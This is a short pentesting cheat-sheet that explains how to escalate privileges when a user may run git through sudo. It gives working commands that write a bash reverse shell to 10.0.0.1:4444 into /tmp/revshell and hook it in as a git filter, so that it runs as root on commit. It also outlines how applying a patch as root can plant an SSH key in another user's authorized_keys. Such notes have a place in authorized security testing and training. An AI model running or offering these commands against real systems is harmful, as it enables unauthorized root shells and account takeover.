Sudo Git Privilege Escalation
Sudo git is vulnerable to privilege escalation.
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"
Copied!If we can commit the git repository as root, we may be able to escalate privileges.
Create a Payload
echo 'bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"' > /tmp/revshell
chmod +x /tmp/revshell
Copied!Set Git Config
# Go to the git repository
cd /opt/example
git init
echo '*.php filter=indent' > .git/info/attributes
git config filter.indent.clean /tmp/revshell
Copied!Commit the Repository
Before committing, we need to start a listener in local machine.
Then commit with sudo.
Now we should get a shell in local terminal.
If we can apply the patch for the git repository, we can update the content of arbitrary file.
Assume we are currently "user1" user then we want to escalate to be "user2". First we create a new SSH key.
New SSH keys (private/public) are generated under /home/user1.
Next, add the content of id_rsa.pub into authorized_keys..
Then create a patch.
After that, replace the name “user1” with “user2” in the patch file.
Now we can apply the patch as root. This command update the target user’s ("user2") authorization_keys to allow us to login with SSH key as "user2".
Last updated